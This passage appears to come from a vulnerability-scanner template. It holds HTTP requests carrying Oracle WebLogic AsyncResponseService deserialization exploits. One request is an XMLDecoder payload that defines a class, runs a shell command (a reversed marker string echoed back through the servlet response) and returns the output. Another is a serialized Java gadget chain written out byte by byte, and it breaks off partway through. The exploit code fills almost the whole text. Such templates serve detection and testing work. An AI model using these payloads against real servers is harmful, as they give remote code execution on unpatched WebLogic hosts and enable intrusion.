method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>6</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>91</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>10</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>98</byte></void><void index=\"201\"><byte>121</byte></void><void index=\"202\"><byte>116</byte></void><void index=\"203\"><byte>101</byte></void><void index=\"204\"><byte>99</byte></void><void index=\"205\"><byte>111</byte></void><void index=\"206\"><byte>100</byte></void><void index=\"207\"><byte>101</byte></void><void index=\"208\"><byte>115</byte></void><void index=\"209\"><byte>116</byte></void><void index=\"210\"><byte>0</byte></void><void index=\"211\"><byte>3</byte></void><void index=\"212\"><byte>91</byte></void><void index=\"213\"><byte>91</byte></void><void index=\"214\"><byte>66</byte></void><void index=\"215\"><byte>91</byte></void><void index=\"216\"><byte>0</byte></void><void index=\"217\"><byte>6</byte></void><void index=\"218\"><byte>95</byte></void><void index=\"219\"><byte>99</byte></void><void index=\"220\"><byte>108</byte></void><void index=\"221\"><byte>97</byte></void><void index=\"222\"><byte>115</byte></void><void index=\"223\"><byte>115</byte></void><void index=\"224\"><byte>116</byte></void><void index=\"225\"><byte>0</byte></void><void index=\"226\"><byte>18</byte></void><void index=\"227\"><byte>91</byte></void><void index=\"228\"><byte>76</byte></void><void index=\"229\"><byte>106</byte></void><void index=\"230\"><byte>97</byte></void><void index=\"231\"><byte>118</byte></void><void index=\"232\"><byte>97</byte></void><void index=\"233\"><byte>47</byte></void><void index=\"234\"><byte>108</byte></void><void index=\"235\"><byte>97</byte></void><void index=\"236\"><byte>110</byte></void><void index=\"237\"><byte>103</byte></void><void index=\"238\"><byte>47</byte></void><void index=\"239\"><byte>67</byte></void><void index=\"240\"><byte>108</byte></void><void index=\"241\"><byte>97</byte></void><void index=\"242\"><byte>115</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>59</byte></void><void index=\"245\"><byte>76</byte></void><void index=\"246\"><byte>0</byte></void><void index=\"247\"><byte>5</byte></void><void index=\"248\"><byte>95</byte></void><void index=\"249\"><byte>110</byte></void><void index=\"250\"><byte>97</byte></void><void index=\"251\"><byte>109</byte></void><void index=\"252\"><byte>101</byte></void><void index=\"253\"><byte>116</byte></void><void index=\"254\"><byte>0</byte></void><void index=\"255\"><byte>18</byte></void><void index=\"256\"><byte>76</byte></void><void index=\"257\"><byte>106</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>118</byte></void><void index=\"260\"><byte>97</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>108</byte></void><void index=\"263\"><byte>97</byte></void><void index=\"264\"><byte>110</byte></void><void index=\"265\"><byte>103</byte></void><void index=\"266\"><byte>47</byte></void><void index=\"267\"><byte>83</byte></void><void index=\"268\"><byte>116</byte></void><void index=\"269\"><byte>114</byte></void><void index=\"270\"><byte>105</byte></void><void index=\"271\"><byte>110</byte></void><void index=\"272\"><byte>103</byte></void><void index=\"273\"><byte>59</byte></void><void index=\"274\"><byte>76</byte></void><void index=\"275\"><byte>0</byte></void><void index=\"276\"><byte>17</byte></void><void index=\"277\"><byte>95</byte></void><void index=\"278\"><byte>111</byte></void><void index=\"279\"><byte>117</byte></void><void index=\"280\"><byte>116</byte></void><void index=\"281\"><byte>112</byte></void><void index=\"282\"><byte>117</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>80</byte></void><void index=\"285\"><byte>114</byte></void><void index=\"286\"><byte>111</byte></void><void index=\"287\"><byte>112</byte></void><void index=\"288\"><byte>101</byte></void><void index=\"289\"><byte>114</byte></void><void index=\"290\"><byte>116</byte></void><void index=\"291\"><byte>105</byte></void><void index=\"292\"><byte>101</byte></void><void index=\"293\"><byte>115</byte></void><void index=\"294\"><byte>116</byte></void><void index=\"295\"><byte>0</byte></void><void index=\"296\"><byte>22</byte></void><void index=\"297\"><byte>76</byte></void><void index=\"298\"><byte>106</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>118</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>47</byte></void><void index=\"303\"><byte>117</byte></void><void index=\"304\"><byte>116</byte></void><void index=\"305\"><byte>105</byte></void><void index=\"306\"><byte>108</byte></void><void index=\"307\"><byte>47</byte></void><void index=\"308\"><byte>80</byte></void><void index=\"309\"><byte>114</byte></void><void index=\"310\"><byte>111</byte></void><void index=\"311\"><byte>112</byte></void><void index=\"312\"><byte>101</byte></void><void index=\"313\"><byte>114</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>105</byte></void><void index=\"316\"><byte>101</byte></void><void index=\"317\"><byte>115</byte></void><void index=\"318\"><byte>59</byte></void><void index=\"319\"><byte>120</byte></void><void index=\"320\"><byte>112</byte></void><void index=\"321\"><byte>0</byte></void><void index=\"322\"><byte>0</byte></void><void index=\"323\"><byte>0</byte></void><void index=\"324\"><byte>0</byte></void><void index=\"325\"><byte>-1</byte></void><void index=\"326\"><byte>-1</byte></void><void index=\"327\"><byte>-1</byte></void><void index=\"328\"><byte>-1</byte></void><void index=\"329\"><byte>117</byte></void><void index=\"330\"><byte>114</byte></void><void index=\"331\"><byte>0</byte></void><void index=\"332\"><byte>3</byte></void><void index=\"333\"><byte>91</byte></void><void index=\"334\"><byte>91</byte></void><void index=\"335\"><byte>66</byte></void><void index=\"336\"><byte>75</byte></void><void index=\"337\"><byte>-3</byte></void><void index=\"338\"><byte>25</byte></void><void index=\"339\"><byte>21</byte></void><void index=\"340\"><byte>103</byte></void><void index=\"341\"><byte>103</byte></void><void index=\"342\"><byte>-37</byte></void><void index=\"343\"><byte>55</byte></void><void index=\"344\"><byte>2</byte></void><void index=\"345\"><byte>0</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>120</byte></void><void index=\"348\"><byte>112</byte></void><void index=\"349\"><byte>0</byte></void><void index=\"350\"><byte>0</byte></void><void index=\"351\"><byte>0</byte></void><void index=\"352\"><byte>2</byte></void><void index=\"353\"><byte>117</byte></void><void index=\"354\"><byte>114</byte></void><void index=\"355\"><byte>0</byte></void><void index=\"356\"><byte>2</byte></void><void index=\"357\"><byte>91</byte></void><void index=\"358\"><byte>66</byte></void><void index=\"359\"><byte>-84</byte></void><void index=\"360\"><byte>-13</byte></void><void index=\"361\"><byte>23</byte></void><void index=\"362\"><byte>-8</byte></void><void index=\"363\"><byte>6</byte></void><void index=\"364\"><byte>8</byte></void><void index=\"365\"><byte>84</byte></void><void index=\"366\"><byte>-32</byte></void><void index=\"367\"><byte>2</byte></void><void index=\"368\"><byte>0</byte></void><void index=\"369\"><byte>0</byte></void><void index=\"370\"><byte>120</byte></void><void index=\"371\"><byte>112</byte></void><void index=\"372\"><byte>0</byte></void><void index=\"373\"><byte>0</byte></void><void index=\"374\"><byte>8</byte></void><void index=\"375\"><byte>-82</byte></void><void index=\"376\"><byte>-54</byte></void><void index=\"377\"><byte>-2</byte></void><void index=\"378\"><byte>-70</byte></void><void index=\"379\"><byte>-66</byte></void><void index=\"380\"><byte>0</byte></void><void index=\"381\"><byte>0</byte></void><void index=\"382\"><byte>0</byte></void><void index=\"383\"><byte>50</byte></void><void index=\"384\"><byte>0</byte></void><void index=\"385\"><byte>99</byte></void><void index=\"386\"><byte>10</byte></void><void index=\"387\"><byte>0</byte></void><void index=\"388\"><byte>3</byte></void><void index=\"389\"><byte>0</byte></void><void index=\"390\"><byte>34</byte></void><void index=\"391\"><byte>7</byte></void><void index=\"392\"><byte>0</byte></void><void index=\"393\"><byte>97</byte></void><void index=\"394\"><byte>7</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>37</byte></void><void index=\"397\"><byte>7</byte></void><void index=\"398\"><byte>0</byte></void><void index=\"399\"><byte>38</byte></void><void index=\"400\"><byte>1</byte></void><void index=\"401\"><byte>0</byte></void><void index=\"402\"><byte>16</byte></void><void index=\"403\"><byte>115</byte></void><void index=\"404\"><byte>101</byte></void><void index=\"405\"><byte>114</byte></void><void index=\"406\"><byte>105</byte></void><void index=\"407\"><byte>97</byte></void><void index=\"408\"><byte>108</byte></void><void index=\"409\"><byte>86</byte></void><void index=\"410\"><byte>101</byte></void><void index=\"411\"><byte>114</byte></void><void index=\"412\"><byte>115</byte></void><void index=\"413\"><byte>105</byte></void><void index=\"414\"><byte>111</byte></void><void index=\"415\"><byte>110</byte></void><void index=\"416\"><byte>85</byte></void><void index=\"417\"><byte>73</byte></void><void index=\"418\"><byte>68</byte></void><void index=\"419\"><byte>1</byte></void><void index=\"420\"><byte>0</byte></void><void index=\"421\"><byte>1</byte></void><void index=\"422\"><byte>74</byte></void><void index=\"423\"><byte>1</byte></void><void index=\"424\"><byte>0</byte></void><void index=\"425\"><byte>13</byte></void><void index=\"426\"><byte>67</byte></void><void index=\"427\"><byte>111</byte></void><void index=\"428\"><byte>110</byte></void><void index=\"429\"><byte>115</byte></void><void index=\"430\"><byte>116</byte></void><void index=\"431\"><byte>97</byte></void><void index=\"432\"><byte>110</byte></void><void index=\"433\"><byte>116</byte></void><void index=\"434\"><byte>86</byte></void><void index=\"435\"><byte>97</byte></void><void index=\"436\"><byte>108</byte></void><void index=\"437\"><byte>117</byte></void><void index=\"438\"><byte>101</byte></void><void index=\"439\"><byte>5</byte></void><void index=\"440\"><byte>-83</byte></void><void index=\"441\"><byte>32</byte></void><void index=\"442\"><byte>-109</byte></void><void index=\"443\"><byte>-13</byte></void><void index=\"444\"><byte>-111</byte></void><void index=\"445\"><byte>-35</byte></void><void index=\"446\"><byte>-17</byte></void><void index=\"447\"><byte>62</byte></void><void index=\"448\"><byte>1</byte></void><void index=\"449\"><byte>0</byte></void><void index=\"450\"><byte>6</byte></void><void index=\"451\"><byte>60</byte></void><void index=\"452\"><byte>105</byte></void><void index=\"453\"><byte>110</byte></void><void index=\"454\"><byte>105</byte></void><void index=\"455\"><byte>116</byte></void><void index=\"456\"><byte>62</byte></void><void index=\"457\"><byte>1</byte></void><void index=\"458\"><byte>0</byte></void><void index=\"459\"><byte>3</byte></void><void index=\"460\"><byte>40</byte></void><void index=\"461\"><byte>41</byte></void><void index=\"462\"><byte>86</byte></void><void index=\"463\"><byte>1</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>4</byte></void><void index=\"466\"><byte>67</byte></void><void index=\"467\"><byte>111</byte></void><void index=\"468\"><byte>100</byte></void><void index=\"469\"><byte>101</byte></void><void index=\"470\"><byte>1</byte></void><void index=\"471\"><byte>0</byte></void><void index=\"472\"><byte>15</byte></void><void index=\"473\"><byte>76</byte></void><void index=\"474\"><byte>105</byte></void><void index=\"475\"><byte>110</byte></void><void index=\"476\"><byte>101</byte></void><void index=\"477\"><byte>78</byte></void><void index=\"478\"><byte>117</byte></void><void index=\"479\"><byte>109</byte></void><void index=\"480\"><byte>98</byte></void><void index=\"481\"><byte>101</byte></void><void index=\"482\"><byte>114</byte></void><void index=\"483\"><byte>84</byte></void><void index=\"484\"><byte>97</byte></void><void index=\"485\"><byte>98</byte></void><void index=\"486\"><byte>108</byte></void><void index=\"487\"><byte>101</byte></void><void index=\"488\"><byte>1</byte></void><void index=\"489\"><byte>0</byte></void><void index=\"490\"><byte>18</byte></void><void index=\"491\"><byte>76</byte></void><void index=\"492\"><byte>111</byte></void><void index=\"493\"><byte>99</byte></void><void index=\"494\"><byte>97</byte></void><void index=\"495\"><byte>108</byte></void><void index=\"496\"><byte>86</byte></void><void index=\"497\"><byte>97</byte></void><void index=\"498\"><byte>114</byte></void><void index=\"499\"><byte>105</byte></void><void index=\"500\"><byte>97</byte></void><void index=\"501\"><byte>98</byte></void><void index=\"502\"><byte>108</byte></void><void index=\"503\"><byte>101</byte></void><void index=\"504\"><byte>84</byte></void><void index=\"505\"><byte>97</byte></void><void index=\"506\"><byte>98</byte></void><void index=\"507\"><byte>108</byte></void><void index=\"508\"><byte>101</byte></void><void index=\"509\"><byte>1</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>4</byte></void><void index=\"512\"><byte>116</byte></void><void index=\"513\"><byte>104</byte></void><void index=\"514\"><byte>105</byte></void><void index=\"515\"><byte>115</byte></void><void index=\"516\"><byte>1</byte></void><void index=\"517\"><byte>0</byte></void><void index=\"518\"><byte>19</byte></void><void index=\"519\"><byte>83</byte></void><void index=\"520\"><byte>116</byte></void><void index=\"521\"><byte>117</byte></void><void index=\"522\"><byte>98</byte></void><void index=\"523\"><byte>84</byte></void><void index=\"524\"><byte>114</byte></void><void index=\"525\"><byte>97</byte></void><void index=\"526\"><byte>110</byte></void><void index=\"527\"><byte>115</byte></void><void index=\"528\"><byte>108</byte></void><void index=\"529\"><byte>101</byte></void><void index=\"530\"><byte>116</byte></void><void index=\"531\"><byte>80</byte></void><void index=\"532\"><byte>97</byte></void><void index=\"533\"><byte>121</byte></void><void index=\"534\"><byte>108</byte></void><void index=\"535\"><byte>111</byte></void><void index=\"536\"><byte>97</byte></void><void index=\"537\"><byte>100</byte></void><void index=\"538\"><byte>1</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>12</byte></void><void index=\"541\"><byte>73</byte></void><void index=\"542\"><byte>110</byte></void><void index=\"543\"><byte>110</byte></void><void index=\"544\"><byte>101</byte></void><void index=\"545\"><byte>114</byte></void><void index=\"546\"><byte>67</byte></void><void index=\"547\"><byte>108</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>115</byte></void><void index=\"550\"><byte>115</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>115</byte></void><void index=\"553\"><byte>1</byte></void><void index=\"554\"><byte>0</byte></void><void index=\"555\"><byte>53</byte></void><void index=\"556\"><byte>76</byte></void><void index=\"557\"><byte>121</byte></void><void index=\"558\"><byte>115</byte></void><void index=\"559\"><byte>111</byte></void><void index=\"560\"><byte>115</byte></void><void index=\"561\"><byte>101</byte></void><void index=\"562\"><byte>114</byte></void><void index=\"563\"><byte>105</byte></void><void index=\"564\"><byte>97</byte></void><void index=\"565\"><byte>108</byte></void><void index=\"566\"><byte>47</byte></void><void index=\"567\"><byte>112</byte></void><void index=\"568\"><byte>97</byte></void><void index=\"569\"><byte>121</byte></void><void index=\"570\"><byte>108</byte></void><void index=\"571\"><byte>111</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>100</byte></void><void index=\"574\"><byte>115</byte></void><void index=\"575\"><byte>47</byte></void><void index=\"576\"><byte>117</byte></void><void index=\"577\"><byte>116</byte></void><void index=\"578\"><byte>105</byte></void><void index=\"579\"><byte>108</byte></void><void index=\"580\"><byte>47</byte></void><void index=\"581\"><byte>71</byte></void><void index=\"582\"><byte>97</byte></void><void index=\"583\"><byte>100</byte></void><void index=\"584\"><byte>103</byte></void><void index=\"585\"><byte>101</byte></void><void index=\"586\"><byte>116</byte></void><void index=\"587\"><byte>115</byte></void><void index=\"588\"><byte>36</byte></void><void index=\"589\"><byte>83</byte></void><void index=\"590\"><byte>116</byte></void><void index=\"591\"><byte>117</byte></void><void index=\"592\"><byte>98</byte></void><void index=\"593\"><byte>84</byte></void><void index=\"594\"><byte>114</byte></void><void index=\"595\"><byte>97</byte></void><void index=\"596\"><byte>110</byte></void><void index=\"597\"><byte>115</byte></void><void index=\"598\"><byte>108</byte></void><void index=\"599\"><byte>101</byte></void><void index=\"600\"><byte>116</byte></void><void index=\"601\"><byte>80</byte></void><void index=\"602\"><byte>97</byte></void><void index=\"603\"><byte>121</byte></void><void index=\"604\"><byte>108</byte></void><void index=\"605\"><byte>111</byte></void><void index=\"606\"><byte>97</byte></void><void index=\"607\"><byte>100</byte></void><void index=\"608\"><byte>59</byte></void><void index=\"609\"><byte>1</byte></void><void index=\"610\"><byte>0</byte></void><void index=\"611\"><byte>9</byte></void><void index=\"612\"><byte>116</byte></void><void index=\"613\"><byte>114</byte></void><void index=\"614\"><byte>97</byte></void><void index=\"615\"><byte>110</byte></void><void index=\"616\"><byte>115</byte></void><void index=\"617\"><byte>102</byte></void><void index=\"618\"><byte>111</byte></void><void index=\"619\"><byte>114</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>1</byte></void><void index=\"622\"><byte>0</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>40</byte></void><void index=\"625\"><byte>76</byte></void><void index=\"626\"><byte>99</byte></void><void index=\"627\"><byte>111</byte></void><void index=\"628\"><byte>109</byte></void><void index=\"629\"><byte>47</byte></void><void index=\"630\"><byte>115</byte></void><void index=\"631\"><byte>117</byte></void><void index=\"632\"><byte>110</byte></void><void index=\"633\"><byte>47</byte></void><void index=\"634\"><byte>111</byte></void><void index=\"635\"><byte>114</byte></void><void index=\"636\"><byte>103</byte></void><void index=\"637\"><byte>47</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>112</byte></void><void index=\"640\"><byte>97</byte></void><void index=\"641\"><byte>99</byte></void><void index=\"642\"><byte>104</byte></void><void index=\"643\"><byte>101</byte></void><void index=\"644\"><byte>47</byte></void><void index=\"645\"><byte>120</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>108</byte></void><void index=\"648\"><byte>97</byte></void><void index=\"649\"><byte>110</byte></void><void index=\"650\"><byte>47</byte></void><void index=\"651\"><byte>105</byte></void><void index=\"652\"><byte>110</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>101</byte></void><void index=\"655\"><byte>114</byte></void><void index=\"656\"><byte>110</byte></void><void index=\"657\"><byte>97</byte></void><void index=\"658\"><byte>108</byte></void><void index=\"659\"><byte>47</byte></void><void index=\"660\"><byte>120</byte></void><void index=\"661\"><byte>115</byte></void><void index=\"662\"><byte>108</byte></void><void index=\"663\"><byte>116</byte></void><void index=\"664\"><byte>99</byte></void><void index=\"665\"><byte>47</byte></void><void index=\"666\"><byte>68</byte></void><void index=\"667\"><byte>79</byte></void><void index=\"668\"><byte>77</byte></void><void index=\"669\"><byte>59</byte></void><void index=\"670\"><byte>91</byte></void><void index=\"671\"><byte>76</byte></void><void index=\"672\"><byte>99</byte></void><void index=\"673\"><byte>111</byte></void><void index=\"674\"><byte>109</byte></void><void index=\"675\"><byte>47</byte></void><void index=\"676\"><byte>115</byte></void><void index=\"677\"><byte>117</byte></void><void index=\"678\"><byte>110</byte></void><void index=\"679\"><byte>47</byte></void><void index=\"680\"><byte>111</byte></void><void index=\"681\"><byte>114</byte></void><void index=\"682\"><byte>103</byte></void><void index=\"683\"><byte>47</byte></void><void index=\"684\"><byte>97</byte></void><void index=\"685\"><byte>112</byte></void><void index=\"686\"><byte>97</byte></void><void index=\"687\"><byte>99</byte></void><void index=\"688\"><byte>104</byte></void><void index=\"689\"><byte>101</byte></void><void index=\"690\"><byte>47</byte></void><void index=\"691\"><byte>120</byte></void><void index=\"692\"><byte>109</byte></void><void index=\"693\"><byte>108</byte></void><void index=\"694\"><byte>47</byte></void><void index=\"695\"><byte>105</byte></void><void index=\"696\"><byte>110</byte></void><void index=\"697\"><byte>116</byte></void><void index=\"698\"><byte>101</byte></void><void index=\"699\"><byte>114</byte></void><void index=\"700\"><byte>110</byte></void><void index=\"701\"><byte>97</byte></void><void index=\"702\"><byte>108</byte></void><void index=\"703\"><byte>47</byte></void><void index=\"704\"><byte>115</byte></void><void index=\"705\"><byte>101</byte></void><void index=\"706\"><byte>114</byte></void><void index=\"707\"><byte>105</byte></void><void index=\"708\"><byte>97</byte></void><void index=\"709\"><byte>108</byte></void><void index=\"710\"><byte>105</byte></void><void index=\"711\"><byte>122</byte></void><void index=\"712\"><byte>101</byte></void><void index=\"713\"><byte>114</byte></void><void index=\"714\"><byte>47</byte></void><void index=\"715\"><byte>83</byte></void><void index=\"716\"><byte>101</byte></void><void index=\"717\"><byte>114</byte></void><void index=\"718\"><byte>105</byte></void><void index=\"719\"><byte>97</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>105</byte></void><void index=\"722\"><byte>122</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>116</byte></void><void index=\"725\"><byte>105</byte></void><void index=\"726\"><byte>111</byte></void><void index=\"727\"><byte>110</byte></void><void index=\"728\"><byte>72</byte></void><void index=\"729\"><byte>97</byte></void><void index=\"730\"><byte>110</byte></void><void index=\"731\"><byte>100</byte></void><void index=\"732\"><byte>108</byte></void><void index=\"733\"><byte>101</byte></void><void index=\"734\"><byte>114</byte></void><void index=\"735\"><byte>59</byte></void><void index=\"736\"><byte>41</byte></void><void index=\"737\"><byte>86</byte></void><void index=\"738\"><byte>1</byte></void><void index=\"739\"><byte>0</byte></void><void index=\"740\"><byte>8</byte></void><void index=\"741\"><byte>100</byte></void><void index=\"742\"><byte>111</byte></void><void index=\"743\"><byte>99</byte></void><void index=\"744\"><byte>117</byte></void><void 